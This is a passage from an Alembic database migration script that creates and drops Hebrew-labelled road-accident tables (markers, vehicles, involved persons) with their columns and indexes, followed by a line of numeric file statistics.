sa.Column('accident_natural_area_hebrew', sa.Text(), nullable=True),
sa.Column('accident_municipal_status', sa.Integer(), nullable=True),
sa.Column('accident_municipal_status_hebrew', sa.Text(), nullable=True),
sa.Column('accident_yishuv_shape', sa.Integer(), nullable=True),
sa.Column('accident_yishuv_shape_hebrew', sa.Text(), nullable=True),
sa.Column('street1', sa.Integer(), nullable=True),
sa.Column('street1_hebrew', sa.Text(), nullable=True),
sa.Column('street2', sa.Integer(), nullable=True),
sa.Column('street2_hebrew', sa.Text(), nullable=True),
sa.Column('non_urban_intersection', sa.Integer(), nullable=True),
sa.Column('non_urban_intersection_hebrew', sa.Text(), nullable=True),
sa.Column('non_urban_intersection_by_junction_number', sa.Text(), nullable=True),
sa.Column('accident_day', sa.Integer(), nullable=True),
sa.Column('accident_hour_raw', sa.Integer(), nullable=True),
sa.Column('accident_hour_raw_hebrew', sa.Text(), nullable=True),
sa.Column('accident_hour', sa.Integer(), nullable=True),
sa.Column('accident_minute', sa.Integer(), nullable=True),
sa.Column('geom', geoalchemy2.types.Geometry(geometry_type='POINT', from_text='ST_GeomFromEWKT', name='geometry'), nullable=True),
sa.Column('longitude', sa.Float(), nullable=True),
sa.Column('latitude', sa.Float(), nullable=True),
sa.Column('x', sa.Float(), nullable=True),
sa.Column('y', sa.Float(), nullable=True),
sa.Column('engine_volume', sa.Integer(), nullable=True),
sa.Column('engine_volume_hebrew', sa.Text(), nullable=True),
sa.Column('manufacturing_year', sa.Integer(), nullable=True),
sa.Column('driving_directions', sa.Integer(), nullable=True),
sa.Column('driving_directions_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_status', sa.Integer(), nullable=True),
sa.Column('vehicle_status_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_attribution', sa.Integer(), nullable=True),
sa.Column('vehicle_attribution_hebrew', sa.Text(), nullable=True),
sa.Column('seats', sa.Integer(), nullable=True),
sa.Column('total_weight', sa.Integer(), nullable=True),
sa.Column('total_weight_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_vehicle_type', sa.Integer(), nullable=True),
sa.Column('vehicle_vehicle_type_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_damage', sa.Integer(), nullable=True),
sa.Column('vehicle_damage_hebrew', sa.Text(), nullable=True),
sa.PrimaryKeyConstraint('accident_id', 'provider_code', 'involve_id', 'accident_year')
)
op.create_index(op.f('ix_involved_markers_hebrew_accident_severity'), 'involved_markers_hebrew', ['accident_severity'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_accident_severity_hebrew'), 'involved_markers_hebrew', ['accident_severity_hebrew'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_accident_timestamp'), 'involved_markers_hebrew', ['accident_timestamp'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_accident_year'), 'involved_markers_hebrew', ['accident_year'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_accident_yishuv_name'), 'involved_markers_hebrew', ['accident_yishuv_name'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_geom'), 'involved_markers_hebrew', ['geom'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_involve_vehicle_type'), 'involved_markers_hebrew', ['involve_vehicle_type'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_involve_vehicle_type_hebrew'), 'involved_markers_hebrew', ['involve_vehicle_type_hebrew'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_involved_type'), 'involved_markers_hebrew', ['involved_type'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_involved_type_hebrew'), 'involved_markers_hebrew', ['involved_type_hebrew'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_road1'), 'involved_markers_hebrew', ['road1'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_road2'), 'involved_markers_hebrew', ['road2'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_road_segment_id'), 'involved_markers_hebrew', ['road_segment_id'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_road_segment_name'), 'involved_markers_hebrew', ['road_segment_name'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_road_segment_number'), 'involved_markers_hebrew', ['road_segment_number'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_road_type'), 'involved_markers_hebrew', ['road_type'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_road_type_hebrew'), 'involved_markers_hebrew', ['road_type_hebrew'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_street1_hebrew'), 'involved_markers_hebrew', ['street1_hebrew'], unique=False)
op.create_index(op.f('ix_involved_markers_hebrew_street2_hebrew'), 'involved_markers_hebrew', ['street2_hebrew'], unique=False)
op.create_table('markers_hebrew',
sa.Column('id', sa.BigInteger(), nullable=False),
sa.Column('provider_and_id', sa.BigInteger(), nullable=True),
sa.Column('provider_code', sa.Integer(), nullable=False),
sa.Column('provider_code_hebrew', sa.Text(), nullable=True),
sa.Column('file_type_police', sa.Integer(), nullable=True),
sa.Column('accident_type', sa.Integer(), nullable=True),
sa.Column('accident_type_hebrew', sa.Text(), nullable=True),
sa.Column('accident_severity', sa.Integer(), nullable=True),
sa.Column('accident_severity_hebrew', sa.Text(), nullable=True),
sa.Column('accident_timestamp', sa.DateTime(), nullable=True),
sa.Column('location_accuracy', sa.Integer(), nullable=True),
sa.Column('location_accuracy_hebrew', sa.Text(), nullable=True),
sa.Column('road_type', sa.Integer(), nullable=True),
sa.Column('road_type_hebrew', sa.Text(), nullable=True),
sa.Column('road_shape', sa.Integer(), nullable=True),
sa.Column('road_shape_hebrew', sa.Text(), nullable=True),
sa.Column('day_type', sa.Integer(), nullable=True),
sa.Column('day_type_hebrew', sa.Text(), nullable=True),
sa.Column('police_unit', sa.Integer(), nullable=True),
sa.Column('police_unit_hebrew', sa.Text(), nullable=True),
sa.Column('one_lane', sa.Integer(), nullable=True),
sa.Column('one_lane_hebrew', sa.Text(), nullable=True),
sa.Column('multi_lane', sa.Integer(), nullable=True),
sa.Column('multi_lane_hebrew', sa.Text(), nullable=True),
sa.Column('speed_limit', sa.Integer(), nullable=True),
sa.Column('speed_limit_hebrew', sa.Text(), nullable=True),
sa.Column('road_intactness', sa.Integer(), nullable=True),
sa.Column('road_intactness_hebrew', sa.Text(), nullable=True),
sa.Column('road_width', sa.Integer(), nullable=True),
sa.Column('road_width_hebrew', sa.Text(), nullable=True),
sa.Column('road_sign', sa.Integer(), nullable=True),
sa.Column('road_sign_hebrew', sa.Text(), nullable=True),
sa.Column('road_light', sa.Integer(), nullable=True),
sa.Column('road_light_hebrew', sa.Text(), nullable=True),
sa.Column('road_control', sa.Integer(), nullable=True),
sa.Column('road_control_hebrew', sa.Text(), nullable=True),
sa.Column('weather', sa.Integer(), nullable=True),
sa.Column('weather_hebrew', sa.Text(), nullable=True),
sa.Column('road_surface', sa.Integer(), nullable=True),
sa.Column('road_surface_hebrew', sa.Text(), nullable=True),
sa.Column('road_object', sa.Integer(), nullable=True),
sa.Column('road_object_hebrew', sa.Text(), nullable=True),
sa.Column('object_distance', sa.Integer(), nullable=True),
sa.Column('object_distance_hebrew', sa.Text(), nullable=True),
sa.Column('didnt_cross', sa.Integer(), nullable=True),
sa.Column('didnt_cross_hebrew', sa.Text(), nullable=True),
sa.Column('cross_mode', sa.Integer(), nullable=True),
sa.Column('cross_mode_hebrew', sa.Text(), nullable=True),
sa.Column('cross_location', sa.Integer(), nullable=True),
sa.Column('cross_location_hebrew', sa.Text(), nullable=True),
sa.Column('cross_direction', sa.Integer(), nullable=True),
sa.Column('cross_direction_hebrew', sa.Text(), nullable=True),
sa.Column('road1', sa.Integer(), nullable=True),
sa.Column('road2', sa.Integer(), nullable=True),
sa.Column('km', sa.Float(), nullable=True),
sa.Column('km_raw', sa.Text(), nullable=True),
sa.Column('km_accurate', sa.Boolean(), nullable=True),
sa.Column('road_segment_id', sa.Integer(), nullable=True),
sa.Column('road_segment_number', sa.Integer(), nullable=True),
sa.Column('road_segment_name', sa.Text(), nullable=True),
sa.Column('road_segment_from_km', sa.Float(), nullable=True),
sa.Column('road_segment_to_km', sa.Float(), nullable=True),
sa.Column('road_segment_length_km', sa.Float(), nullable=True),
sa.Column('yishuv_symbol', sa.Integer(), nullable=True),
sa.Column('yishuv_name', sa.Text(), nullable=True),
sa.Column('geo_area', sa.Integer(), nullable=True),
sa.Column('geo_area_hebrew', sa.Text(), nullable=True),
sa.Column('day_night', sa.Integer(), nullable=True),
sa.Column('day_night_hebrew', sa.Text(), nullable=True),
sa.Column('day_in_week', sa.Integer(), nullable=True),
sa.Column('day_in_week_hebrew', sa.Text(), nullable=True),
sa.Column('traffic_light', sa.Integer(), nullable=True),
sa.Column('traffic_light_hebrew', sa.Text(), nullable=True),
sa.Column('region', sa.Integer(), nullable=True),
sa.Column('region_hebrew', sa.Text(), nullable=True),
sa.Column('district', sa.Integer(), nullable=True),
sa.Column('district_hebrew', sa.Text(), nullable=True),
sa.Column('natural_area', sa.Integer(), nullable=True),
sa.Column('natural_area_hebrew', sa.Text(), nullable=True),
sa.Column('municipal_status', sa.Integer(), nullable=True),
sa.Column('municipal_status_hebrew', sa.Text(), nullable=True),
sa.Column('yishuv_shape', sa.Integer(), nullable=True),
sa.Column('yishuv_shape_hebrew', sa.Text(), nullable=True),
sa.Column('street1', sa.Integer(), nullable=True),
sa.Column('street1_hebrew', sa.Text(), nullable=True),
sa.Column('street2', sa.Integer(), nullable=True),
sa.Column('street2_hebrew', sa.Text(), nullable=True),
sa.Column('house_number', sa.Integer(), nullable=True),
sa.Column('non_urban_intersection', sa.Integer(), nullable=True),
sa.Column('non_urban_intersection_hebrew', sa.Text(), nullable=True),
sa.Column('non_urban_intersection_by_junction_number', sa.Text(), nullable=True),
sa.Column('urban_intersection', sa.Integer(), nullable=True),
sa.Column('accident_year', sa.Integer(), nullable=False),
sa.Column('accident_month', sa.Integer(), nullable=True),
sa.Column('accident_day', sa.Integer(), nullable=True),
sa.Column('accident_hour_raw', sa.Integer(), nullable=True),
sa.Column('accident_hour_raw_hebrew', sa.Text(), nullable=True),
sa.Column('accident_hour', sa.Integer(), nullable=True),
sa.Column('accident_minute', sa.Integer(), nullable=True),
sa.Column('geom', geoalchemy2.types.Geometry(geometry_type='POINT', from_text='ST_GeomFromEWKT', name='geometry'), nullable=True),
sa.Column('longitude', sa.Float(), nullable=True),
sa.Column('latitude', sa.Float(), nullable=True),
sa.Column('x', sa.Float(), nullable=True),
sa.Column('y', sa.Float(), nullable=True),
sa.PrimaryKeyConstraint('id', 'provider_code', 'accident_year')
)
op.create_index(op.f('ix_markers_hebrew_accident_severity'), 'markers_hebrew', ['accident_severity'], unique=False)
op.create_index(op.f('ix_markers_hebrew_accident_severity_hebrew'), 'markers_hebrew', ['accident_severity_hebrew'], unique=False)
op.create_index(op.f('ix_markers_hebrew_accident_timestamp'), 'markers_hebrew', ['accident_timestamp'], unique=False)
op.create_index(op.f('ix_markers_hebrew_accident_type'), 'markers_hebrew', ['accident_type'], unique=False)
op.create_index(op.f('ix_markers_hebrew_accident_type_hebrew'), 'markers_hebrew', ['accident_type_hebrew'], unique=False)
op.create_index(op.f('ix_markers_hebrew_accident_year'), 'markers_hebrew', ['accident_year'], unique=False)
op.create_index(op.f('ix_markers_hebrew_geom'), 'markers_hebrew', ['geom'], unique=False)
op.create_index(op.f('ix_markers_hebrew_road1'), 'markers_hebrew', ['road1'], unique=False)
op.create_index(op.f('ix_markers_hebrew_road2'), 'markers_hebrew', ['road2'], unique=False)
op.create_index(op.f('ix_markers_hebrew_road_segment_id'), 'markers_hebrew', ['road_segment_id'], unique=False)
op.create_index(op.f('ix_markers_hebrew_road_segment_name'), 'markers_hebrew', ['road_segment_name'], unique=False)
op.create_index(op.f('ix_markers_hebrew_road_segment_number'), 'markers_hebrew', ['road_segment_number'], unique=False)
op.create_index(op.f('ix_markers_hebrew_street1_hebrew'), 'markers_hebrew', ['street1_hebrew'], unique=False)
op.create_index(op.f('ix_markers_hebrew_street2_hebrew'), 'markers_hebrew', ['street2_hebrew'], unique=False)
op.create_index(op.f('ix_markers_hebrew_yishuv_name'), 'markers_hebrew', ['yishuv_name'], unique=False)
op.create_table('vehicles_hebrew',
sa.Column('id', sa.BigInteger(), nullable=False),
sa.Column('accident_id', sa.BigInteger(), nullable=False),
sa.Column('provider_and_id', sa.BigInteger(), nullable=True),
sa.Column('provider_code', sa.Integer(), nullable=False),
sa.Column('file_type_police', sa.Integer(), nullable=True),
sa.Column('car_id', sa.Integer(), nullable=True),
sa.Column('engine_volume', sa.Integer(), nullable=True),
sa.Column('engine_volume_hebrew', sa.Text(), nullable=True),
sa.Column('manufacturing_year', sa.Integer(), nullable=True),
sa.Column('driving_directions', sa.Integer(), nullable=True),
sa.Column('driving_directions_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_status', sa.Integer(), nullable=True),
sa.Column('vehicle_status_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_attribution', sa.Integer(), nullable=True),
sa.Column('vehicle_attribution_hebrew', sa.Text(), nullable=True),
sa.Column('seats', sa.Integer(), nullable=True),
sa.Column('total_weight', sa.Integer(), nullable=True),
sa.Column('total_weight_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_type', sa.Integer(), nullable=True),
sa.Column('vehicle_type_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_damage', sa.Integer(), nullable=True),
sa.Column('vehicle_damage_hebrew', sa.Text(), nullable=True),
sa.Column('accident_year', sa.Integer(), nullable=False),
sa.Column('accident_month', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('id', 'accident_id', 'provider_code', 'accident_year')
)
op.create_index(op.f('ix_vehicles_hebrew_accident_year'), 'vehicles_hebrew', ['accident_year'], unique=False)
op.create_index(op.f('ix_vehicles_hebrew_vehicle_type'), 'vehicles_hebrew', ['vehicle_type'], unique=False)
op.create_index(op.f('ix_vehicles_hebrew_vehicle_type_hebrew'), 'vehicles_hebrew', ['vehicle_type_hebrew'], unique=False)
op.create_table('vehicles_markers_hebrew',
sa.Column('accident_timestamp', sa.DateTime(), nullable=True),
sa.Column('accident_type', sa.Integer(), nullable=True),
sa.Column('accident_type_hebrew', sa.Text(), nullable=True),
sa.Column('accident_severity', sa.Integer(), nullable=True),
sa.Column('accident_severity_hebrew', sa.Text(), nullable=True),
sa.Column('location_accuracy', sa.Integer(), nullable=True),
sa.Column('location_accuracy_hebrew', sa.Text(), nullable=True),
sa.Column('road_type', sa.Integer(), nullable=True),
sa.Column('road_type_hebrew', sa.Text(), nullable=True),
sa.Column('road_shape', sa.Integer(), nullable=True),
sa.Column('road_shape_hebrew', sa.Text(), nullable=True),
sa.Column('day_type', sa.Integer(), nullable=True),
sa.Column('day_type_hebrew', sa.Text(), nullable=True),
sa.Column('police_unit', sa.Integer(), nullable=True),
sa.Column('police_unit_hebrew', sa.Text(), nullable=True),
sa.Column('one_lane', sa.Integer(), nullable=True),
sa.Column('one_lane_hebrew', sa.Text(), nullable=True),
sa.Column('multi_lane', sa.Integer(), nullable=True),
sa.Column('multi_lane_hebrew', sa.Text(), nullable=True),
sa.Column('speed_limit', sa.Integer(), nullable=True),
sa.Column('speed_limit_hebrew', sa.Text(), nullable=True),
sa.Column('road_intactness', sa.Integer(), nullable=True),
sa.Column('road_intactness_hebrew', sa.Text(), nullable=True),
sa.Column('road_width', sa.Integer(), nullable=True),
sa.Column('road_width_hebrew', sa.Text(), nullable=True),
sa.Column('road_sign', sa.Integer(), nullable=True),
sa.Column('road_sign_hebrew', sa.Text(), nullable=True),
sa.Column('road_light', sa.Integer(), nullable=True),
sa.Column('road_light_hebrew', sa.Text(), nullable=True),
sa.Column('road_control', sa.Integer(), nullable=True),
sa.Column('road_control_hebrew', sa.Text(), nullable=True),
sa.Column('weather', sa.Integer(), nullable=True),
sa.Column('weather_hebrew', sa.Text(), nullable=True),
sa.Column('road_surface', sa.Integer(), nullable=True),
sa.Column('road_surface_hebrew', sa.Text(), nullable=True),
sa.Column('road_object', sa.Integer(), nullable=True),
sa.Column('road_object_hebrew', sa.Text(), nullable=True),
sa.Column('object_distance', sa.Integer(), nullable=True),
sa.Column('object_distance_hebrew', sa.Text(), nullable=True),
sa.Column('didnt_cross', sa.Integer(), nullable=True),
sa.Column('didnt_cross_hebrew', sa.Text(), nullable=True),
sa.Column('cross_mode', sa.Integer(), nullable=True),
sa.Column('cross_mode_hebrew', sa.Text(), nullable=True),
sa.Column('cross_location', sa.Integer(), nullable=True),
sa.Column('cross_location_hebrew', sa.Text(), nullable=True),
sa.Column('cross_direction', sa.Integer(), nullable=True),
sa.Column('cross_direction_hebrew', sa.Text(), nullable=True),
sa.Column('road1', sa.Integer(), nullable=True),
sa.Column('road2', sa.Integer(), nullable=True),
sa.Column('km', sa.Float(), nullable=True),
sa.Column('km_raw', sa.Text(), nullable=True),
sa.Column('km_accurate', sa.Boolean(), nullable=True),
sa.Column('road_segment_id', sa.Integer(), nullable=True),
sa.Column('road_segment_number', sa.Integer(), nullable=True),
sa.Column('road_segment_name', sa.Text(), nullable=True),
sa.Column('road_segment_from_km', sa.Float(), nullable=True),
sa.Column('road_segment_to_km', sa.Float(), nullable=True),
sa.Column('road_segment_length_km', sa.Float(), nullable=True),
sa.Column('accident_yishuv_symbol', sa.Integer(), nullable=True),
sa.Column('accident_yishuv_name', sa.Text(), nullable=True),
sa.Column('geo_area', sa.Integer(), nullable=True),
sa.Column('geo_area_hebrew', sa.Text(), nullable=True),
sa.Column('day_night', sa.Integer(), nullable=True),
sa.Column('day_night_hebrew', sa.Text(), nullable=True),
sa.Column('day_in_week', sa.Integer(), nullable=True),
sa.Column('day_in_week_hebrew', sa.Text(), nullable=True),
sa.Column('traffic_light', sa.Integer(), nullable=True),
sa.Column('traffic_light_hebrew', sa.Text(), nullable=True),
sa.Column('accident_region', sa.Integer(), nullable=True),
sa.Column('accident_region_hebrew', sa.Text(), nullable=True),
sa.Column('accident_district', sa.Integer(), nullable=True),
sa.Column('accident_district_hebrew', sa.Text(), nullable=True),
sa.Column('accident_natural_area', sa.Integer(), nullable=True),
sa.Column('accident_natural_area_hebrew', sa.Text(), nullable=True),
sa.Column('accident_municipal_status', sa.Integer(), nullable=True),
sa.Column('accident_municipal_status_hebrew', sa.Text(), nullable=True),
sa.Column('accident_yishuv_shape', sa.Integer(), nullable=True),
sa.Column('accident_yishuv_shape_hebrew', sa.Text(), nullable=True),
sa.Column('street1', sa.Integer(), nullable=True),
sa.Column('street1_hebrew', sa.Text(), nullable=True),
sa.Column('street2', sa.Integer(), nullable=True),
sa.Column('street2_hebrew', sa.Text(), nullable=True),
sa.Column('non_urban_intersection', sa.Integer(), nullable=True),
sa.Column('non_urban_intersection_hebrew', sa.Text(), nullable=True),
sa.Column('non_urban_intersection_by_junction_number', sa.Text(), nullable=True),
sa.Column('accident_day', sa.Integer(), nullable=True),
sa.Column('accident_hour_raw', sa.Integer(), nullable=True),
sa.Column('accident_hour_raw_hebrew', sa.Text(), nullable=True),
sa.Column('accident_hour', sa.Integer(), nullable=True),
sa.Column('accident_minute', sa.Integer(), nullable=True),
sa.Column('accident_year', sa.Integer(), nullable=False),
sa.Column('accident_month', sa.Integer(), nullable=True),
sa.Column('geom', geoalchemy2.types.Geometry(geometry_type='POINT', from_text='ST_GeomFromEWKT', name='geometry'), nullable=True),
sa.Column('longitude', sa.Float(), nullable=True),
sa.Column('latitude', sa.Float(), nullable=True),
sa.Column('x', sa.Float(), nullable=True),
sa.Column('y', sa.Float(), nullable=True),
sa.Column('id', sa.BigInteger(), nullable=False),
sa.Column('accident_id', sa.BigInteger(), nullable=False),
sa.Column('provider_and_id', sa.BigInteger(), nullable=True),
sa.Column('provider_code', sa.Integer(), nullable=False),
sa.Column('file_type_police', sa.Integer(), nullable=True),
sa.Column('engine_volume', sa.Integer(), nullable=True),
sa.Column('engine_volume_hebrew', sa.Text(), nullable=True),
sa.Column('manufacturing_year', sa.Integer(), nullable=True),
sa.Column('driving_directions', sa.Integer(), nullable=True),
sa.Column('driving_directions_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_status', sa.Integer(), nullable=True),
sa.Column('vehicle_status_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_attribution', sa.Integer(), nullable=True),
sa.Column('vehicle_attribution_hebrew', sa.Text(), nullable=True),
sa.Column('seats', sa.Integer(), nullable=True),
sa.Column('total_weight', sa.Integer(), nullable=True),
sa.Column('total_weight_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_type', sa.Integer(), nullable=True),
sa.Column('vehicle_type_hebrew', sa.Text(), nullable=True),
sa.Column('vehicle_damage', sa.Integer(), nullable=True),
sa.Column('vehicle_damage_hebrew', sa.Text(), nullable=True),
sa.Column('car_id', sa.Integer(), nullable=True),
sa.PrimaryKeyConstraint('accident_year', 'id', 'accident_id', 'provider_code')
)
op.create_index(op.f('ix_vehicles_markers_hebrew_accident_severity'), 'vehicles_markers_hebrew', ['accident_severity'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_accident_severity_hebrew'), 'vehicles_markers_hebrew', ['accident_severity_hebrew'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_accident_type'), 'vehicles_markers_hebrew', ['accident_type'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_accident_type_hebrew'), 'vehicles_markers_hebrew', ['accident_type_hebrew'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_accident_year'), 'vehicles_markers_hebrew', ['accident_year'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_accident_yishuv_name'), 'vehicles_markers_hebrew', ['accident_yishuv_name'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_geom'), 'vehicles_markers_hebrew', ['geom'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_road1'), 'vehicles_markers_hebrew', ['road1'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_road2'), 'vehicles_markers_hebrew', ['road2'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_road_segment_id'), 'vehicles_markers_hebrew', ['road_segment_id'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_road_segment_name'), 'vehicles_markers_hebrew', ['road_segment_name'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_road_segment_number'), 'vehicles_markers_hebrew', ['road_segment_number'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_street1_hebrew'), 'vehicles_markers_hebrew', ['street1_hebrew'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_street2_hebrew'), 'vehicles_markers_hebrew', ['street2_hebrew'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_vehicle_type'), 'vehicles_markers_hebrew', ['vehicle_type'], unique=False)
op.create_index(op.f('ix_vehicles_markers_hebrew_vehicle_type_hebrew'), 'vehicles_markers_hebrew', ['vehicle_type_hebrew'], unique=False)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_vehicles_markers_hebrew_vehicle_type_hebrew'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_vehicle_type'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_street2_hebrew'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_street1_hebrew'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_road_segment_number'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_road_segment_name'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_road_segment_id'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_road2'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_road1'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_geom'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_accident_yishuv_name'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_accident_year'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_accident_type_hebrew'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_accident_type'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_accident_severity_hebrew'), table_name='vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_markers_hebrew_accident_severity'), table_name='vehicles_markers_hebrew')
op.drop_table('vehicles_markers_hebrew')
op.drop_index(op.f('ix_vehicles_hebrew_vehicle_type_hebrew'), table_name='vehicles_hebrew')
op.drop_index(op.f('ix_vehicles_hebrew_vehicle_type'), table_name='vehicles_hebrew')
op.drop_index(op.f('ix_vehicles_hebrew_accident_year'), table_name='vehicles_hebrew')
op.drop_table('vehicles_hebrew')
op.drop_index(op.f('ix_markers_hebrew_yishuv_name'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_street2_hebrew'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_street1_hebrew'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_road_segment_number'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_road_segment_name'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_road_segment_id'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_road2'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_road1'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_geom'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_accident_year'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_accident_type_hebrew'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_accident_type'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_accident_timestamp'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_accident_severity_hebrew'), table_name='markers_hebrew')
op.drop_index(op.f('ix_markers_hebrew_accident_severity'), table_name='markers_hebrew')
op.drop_table('markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_street2_hebrew'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_street1_hebrew'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_road_type_hebrew'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_road_type'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_road_segment_number'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_road_segment_name'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_road_segment_id'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_road2'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_road1'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_involved_type_hebrew'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_involved_type'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_involve_vehicle_type_hebrew'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_involve_vehicle_type'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_geom'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_accident_yishuv_name'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_accident_year'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_accident_timestamp'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_accident_severity_hebrew'), table_name='involved_markers_hebrew')
op.drop_index(op.f('ix_involved_markers_hebrew_accident_severity'), table_name='involved_markers_hebrew')
op.drop_table('involved_markers_hebrew')
op.drop_index(op.f('ix_involved_hebrew_vehicle_type_hebrew'), table_name='involved_hebrew')
op.drop_index(op.f('ix_involved_hebrew_vehicle_type'), table_name='involved_hebrew')
op.drop_index(op.f('ix_involved_hebrew_involved_type_hebrew'), table_name='involved_hebrew')
op.drop_index(op.f('ix_involved_hebrew_involved_type'), table_name='involved_hebrew')
op.drop_index(op.f('ix_involved_hebrew_accident_year'), table_name='involved_hebrew')
op.drop_table('involved_hebrew')
# ### end Alembic commands ###
| 69.375594 | 157 | 0.73136 | 6,061 | 43,776 | 4.993895 | 0.029863 | 0.120788 | 0.203053 | 0.286772 | 0.983084 | 0.974296 | 0.962865 | 0.953251 | 0.920213 | 0.889421 | 0 | 0.002938 | 0.097976 | 43,776 | 630 | 158 | 69.485714 | 0.763593 | 0.007127 | 0 | 0.690789 | 0 | 0 | 0.355171 | 0.197366 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003289 | false | 0 | 0.006579 | 0 | 0.009868 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
